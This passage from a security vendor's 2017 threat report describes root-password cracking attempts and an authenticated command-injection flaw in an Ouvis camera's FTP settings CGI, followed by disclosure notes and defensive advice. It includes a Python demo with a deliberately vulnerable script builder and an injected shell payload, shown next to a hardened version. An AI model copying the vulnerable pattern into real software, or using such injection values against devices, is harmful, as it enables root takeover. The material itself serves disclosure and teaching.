Access to a password hash allows for faster, more efficient offline password cracking. In one last attempt to obtain the root password, our team fed the passwd file through hashcat, a popular hash cracking application. After several days of cracking, attempting every possible character combination up to and including eight characters, hashcat failed to yield any results.

We still consider this open Telnet access a weakness, especially since the device includes a hard-coded root password (which some might call a backdoor account). The good news is the root password has withstood several significant cracking attempts so far. It seems the device manufacturer was at least conscious enough to use a strong password. That said, if anyone ever recovers this password, it could provide a backdoor to all these devices. In fact, we have since correlated with other researchers' analysis, and have confirmed that all these Ouvis cameras share the same root password hash. If the password ever leaks, it will provide attackers with unrestricted access to these devices.

Authenticated Remote Code Execution Vulnerability In auditing IoT devices like webcams, our research team frequently finds web application flaws in web management portals due to un-sanitized inputs. After finding a remote code execution vulnerability in one of the web management pages of a similar IoT camera, the team checked the same location (FTP backup settings) for this Ouvis camera, and found the exact same vulnerability (see our Q4 report for more details on the previous issue).

Figure 21: Hashed root password

A packet capture of DNS traffic from the camera showed an attempted name resolution for ‘rce.bad’, confirming the remote code execution vulnerability.

As it turned out, the Common Gateway Interface (CGI) handler for FTP configuration (set_ftp.cgi) did not sanitize the user input before saving it to an FTP upload script located at /tmp/ftpupload.sh. The camera runs this script as a privileged user, which in turn executes any command an attacker injects into this un-sanitized input (in our example, the ping command).

This serious vulnerability could allow attackers to execute any command on this camera as root, thus elevating their privileges. However, this is an “authenticated” vulnerability, meaning the attacker must already have valid management credentials in order to exploit this flaw.
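The flaw above is a textbook shell command injection: a CGI parameter is written unchanged into a script that the camera later runs as root. The following is an added example, not the camera's code, that shows the vulnerable pattern the report describes next to a hardened builder that allow-lists the hostname and quotes every value. The report names set_ftp.cgi, /tmp/ftpupload.sh, root execution and the ping confirmation; the parameter name `svr`, the busybox-style `ftpput` line, the script layout and the sample payload are our assumptions.

```python
"""The Ouvis bug class as an added example: a CGI handler writes a user-supplied
FTP setting into a shell script that later runs as root, so a value containing
shell metacharacters becomes extra commands.

Not the camera's code: the report names set_ftp.cgi, /tmp/ftpupload.sh, root
execution and the ping-based confirmation, nothing more. The parameter name
'svr', the busybox-style ftpput line, the script layout and the sample payload
are our assumptions. The vulnerable builder keeps the flaw on purpose; the
hardened one validates and quotes.
"""
import re
import shlex
import subprocess

# RFC 1123-style hostname (also accepts dotted IPv4); rejects spaces, ';', '$(' etc.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def build_ftpupload_vulnerable(svr, user, pwd, path="/tmp/snapshot.jpg"):
    """What the report describes: parameters interpolated verbatim."""
    return f"#!/bin/sh\nftpput -u {user} -p {pwd} {svr} upload.jpg {path}\n"


def build_ftpupload_safe(svr, user, pwd, path="/tmp/snapshot.jpg"):
    """Allow-list the hostname, then quote every value so the shell sees
    exactly one word per parameter whatever characters it contains."""
    if not HOSTNAME_RE.match(svr):
        raise ValueError("invalid FTP server name")
    return "#!/bin/sh\nftpput -u {} -p {} {} upload.jpg {}\n".format(
        shlex.quote(user), shlex.quote(pwd), shlex.quote(svr), shlex.quote(path))


def shell_words(script):
    """Split the ftpput line the way a POSIX shell would, with ; | & as operators,
    so an injected command shows up as separate words."""
    lexer = shlex.shlex(script.splitlines()[1], posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def run_as_shell(script):
    """Execute a generated script with sh, as the camera does (demo only)."""
    result = subprocess.run(["sh", "-c", script], capture_output=True, text=True)
    return result.stdout + result.stderr


if __name__ == "__main__":
    # Stand-in for the report's payload (which resolved 'rce.bad' via ping).
    payload = "ftp.example.net; echo INJECTED; "
    vuln = build_ftpupload_vulnerable(payload, "cam", "s3cret")
    print(shell_words(vuln))          # ... ';', 'echo', 'INJECTED', ... : the value escaped its slot
    print(run_as_shell(vuln))         # ftpput is missing here, but the echo runs anyway
    try:
        build_ftpupload_safe(payload, "cam", "s3cret")
    except ValueError as exc:
        print("rejected:", exc)
    safe = build_ftpupload_safe("ftp.example.net", "cam", "s3cret;echo nope")
    print(shell_words(safe))          # exactly 8 words; ';' stays inside the password
```

Quoting alone would already stop the breakout; the hostname allow-list is the second layer, because a value that is never going to be a valid server name has no business reaching the script at all. The same applies to every other field the CGI writes out: each one is attacker input until proven otherwise.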

Conclusion After confirming both vulnerabilities, our researchers immediately submitted a report to Ouvis via their support contact. Ouvis did not respond to our disclosure attempts over a 90-day period.

After 60 days, a separate researcher disclosed the same, and further vulnerabilities in a series of cameras appearing to be manufactured by the same OEM supplier. Because the Ouvis C2 was not present in Pierre Kim’s list of affected models, we continued the originally planned 90-day disclosure period. After no contact from the vendor, we responsibly disclosed this research publicly on April 24, 2017.

Timeline
• 2 January 2017 – Vulnerabilities discovered
• 4 January 2017 – Reported to manufacturer
• 3 February 2017 – Manufacturer contacted a second time
• 6 March 2017 – Manufacturer informed of imminent public disclosure
• 8 March 2017 – Similar vulnerabilities zero day'd by Pierre Kim
• 3 April 2017 – Manufacturer contacted a final time
• 24 April 2017 – Public disclosure

WatchGuard Threat Lab’s Research Defense Learnings

Our research shows consumer IoT devices continue to ship with weaknesses and security vulnerabilities. At best, these issues could result in loss of privacy for consumers. At worst, they might allow attackers to take over these devices, gaining a foothold into your internal network.

Consumers should take steps to secure the IoT devices they purchase, as well as urge device manufacturers to focus on security. At a minimum, here are three IoT defense strategies that help.

1. Change default passwords

IoT manufacturers often hardcode weak or non-existent passwords to make their products easier to use (at the risk of security). When first setting up a new IoT device your first task should be setting new, difficult-to-guess passwords wherever possible.

2. Avoid exposing CLI management interfaces to the Internet

Most IoT devices have no legitimate need for CLI access via Telnet or SSH. If you port scan your IoT device and find open CLI access, take extra caution while deploying it. Implement network firewall rules to block inbound Telnet and SSH access not only from the Internet, but from other internal networks as well (to prevent attack pivoting).

3. Avoid IoT devices with hard-coded backdoor accounts

Some manufacturers ship IoT devices with set accounts that have the same hard-coded password for all devices. If consumers are unaware of the account, it’s essentially a backdoor. Before purchasing an IoT device, research the manufacturer’s history in securing their products. Avoid vendors that are known to include hard-coded backdoor accounts in their IoT devices.


Conclusion & Defense Highlights

One lesson you learn if you follow any trend over time is things change. Sometimes they change at a glacial pace, so slowly that you may not notice the alterations. Other times they change overnight, so quickly that you can’t get your bearings straight. This constant change applies directly to the threat and security landscape as well.

When change happens unexpectedly, it feels scary, and can cause unforeseen surprises that hurt when they hit you unprepared. However, change doesn’t have to be scary. In fact, when you vigilantly monitor change, you can adapt and prepare for it, protecting yourself from unanticipated consequences.

This quarter, we saw some of the same malware and network attacks retain their place on our top threat lists. However, we also saw new threats and exploits replace the old ones. For instance, macro malware – a top threat from Q4 2016 – dropped off our list, becoming less relevant in Q1. Meanwhile, we saw three times as much Linux malware as we did before, suggesting attackers have increased their efforts to target IoT.

That’s the whole point of this quarterly security report – to prepare you for change in the threat landscape. By staying current with the latest threat trends, you can adapt your technical and social security strategies to defend against evolving threats. Throughout this report, we shared detailed defense lessons for the individual trends we identified. We’ll end with a few final high-level defense strategies every organization should consider.


Basic security policies still block many threats

Security experts often spend much of their time talking about the most sophisticated threats. We get excited about new zero day exploits, the latest kernel rootkits, and other never-before-seen attacks and evasion techniques. From a security expert’s perspective, it makes sense to focus on the more interesting, advanced threats, which will surely become more common in the future. However, our data shows that the top threats aren’t always new or sophisticated. In fact, most of the popular network attacks we saw this quarter exploited old vulnerabilities that were patched long ago. Many of the top malware samples we identified were well-known examples, which attackers have used for years. Even the vulnerabilities we found in IoT devices were very standard weaknesses that have simple solutions. The point is, you can prevent a significant slice of these threats just by following some basic security practices. Patch your software often. Avoid opening unsolicited files, or clicking unexpected links. Firewall your IoT devices. These simple practices still do help.

Basic firewalls are incomplete without other security layers

Firewalls remain a critical part of our security infrastructure. You must limit the network services you expose to the Internet (as proven with insecure IoT devices). However, a firewall alone is not enough. Today, most attacks don’t target exposed services directly, but rather target your users instead. Even with a firewall, almost all organizations open holes allowing their users to reach the web, get email, or transfer files (among other things). To protect against today’s client-side attacks, you must also implement a suite of security services, such as intrusion prevention, anti-malware, IP and URL filtering, and more, to monitor the services you allow through your firewall for malicious activity. If you don’t yet have a layered security strategy, consider a unified threat management platform that combines basic firewalling with many other layers of protection.

Segment and harden your IoT devices

In the current state of the industry, IoT devices can’t yet be trusted. While there are certainly exceptions, our research, as well as other industry research, suggests the vast majority of IoT devices have major security weaknesses, and can pose a threat to the rest of your network. You might presume criminals don’t care about your webcams, refrigerators, or DVRs, but attackers know they can use these local devices to reach more important computers in your network. Since manufacturers are shipping these devices with vulnerabilities, it’s up to you to secure them. First, firewall IoT devices from the Internet and only expose necessary services. In fact, we recommend you segment them on your internal network, too. That way if someone hijacks your IoT device, they don’t immediately gain access to everything else. Finally, remember to change default passwords, disable unnecessary services, and patch these products as often as possible.

Invest in advanced malware prevention

We said it last quarter, and it remains true this quarter: if you don’t have an advanced malware protection solution, you will eventually get infected. While many of the threats we see are well known, it’s clear attackers regularly repackage their old malware to evade pattern-based detection. This quarter we learned that 38% – over one third – of the malware we detected got past legacy signature-based AV solutions. The industry has long understood the weakness in reactive, pattern-based AV, but this problem has reached a critical mass. More and more victims are getting infected with threats like ransomware despite having basic protection. To catch today’s more evasive malware, you need solutions that use more proactive detection techniques, such as behavioral analysis, or machine learning and big data analytics. We recommend you invest in an advanced malware solution. If you’re a WatchGuard customer, our APT Blocker and Threat Detection and Response offerings provide this service.

Summary

If you made it this far, thank you for reading our report to the end. We hope you found the trends and analysis enlightening, and use these learnings to protect your networks and organizations. Feel free to share any feedback you have about the report with [email protected], and join us next quarter.

Corey Nachreiner Chief Technology Officer

Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard’s technology vision and direction. Previously, he was the director of strategy and research at WatchGuard. Nachreiner has operated at the frontline of cyber security for 16 years, and for nearly a decade has been evaluating and making accurate predictions about information security trends. As an authority on network security and internationally quoted commentator, Nachreiner’s expertise and ability to dissect complex security topics make him a sought-after speaker at forums such as Gartner, Infosec and RSA. He is also a regular contributor to leading publications including CNET, Dark Reading, eWeek, Help Net Security, Information Week and Infosecurity, and delivers WatchGuard’s “Daily Security Byte” video on Facebook.

Marc Laliberte Security Threat Analyst

Specializing in network security technologies, Marc’s industry experience allows him to conduct meaningful information security research and educate audiences on the latest cyber security trends and best practices. With speaking appearances at IT conferences and regular contributions to online IT and security publications, Marc is a security expert who enjoys providing unique insights and guidance to all levels of IT personnel.

About WatchGuard Threat Lab WatchGuard’s Threat Lab (previously the LiveSecurity Threat Team) is a group of dedicated threat researchers committed to discovering and studying the latest malware and Internet attacks. The Threat Lab team analyzes data from WatchGuard’s Firebox Feed, internal and partner threat intelligence, and a research honeynet, to provide insightful analysis about the top threats on the Internet. Their smart, practical security advice will enable you to better protect your organization in the ever-changing threat landscape.

About WatchGuard Technologies WatchGuard® Technologies, Inc. is a global leader in network security, providing best-in-class Unified Threat Management, Next Generation Firewall, secure Wi-Fi, and network intelligence products and services to more than 80,000 customers worldwide. The company’s mission is to make enterprise-grade security accessible to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for distributed enterprises and SMBs. WatchGuard is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

For additional information, promotions and updates, follow WatchGuard on Twitter @WatchGuard, on Facebook, and on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org.

© 2017 WatchGuard Technologies, Inc. All rights reserved. WatchGuard, the WatchGuard logo, LiveSecurity, and Firebox are registered trademarks of WatchGuard Technologies, Inc. in the United States and/or other countries. All other tradenames are the property of their respective owners. Part No. WGCE67003_062017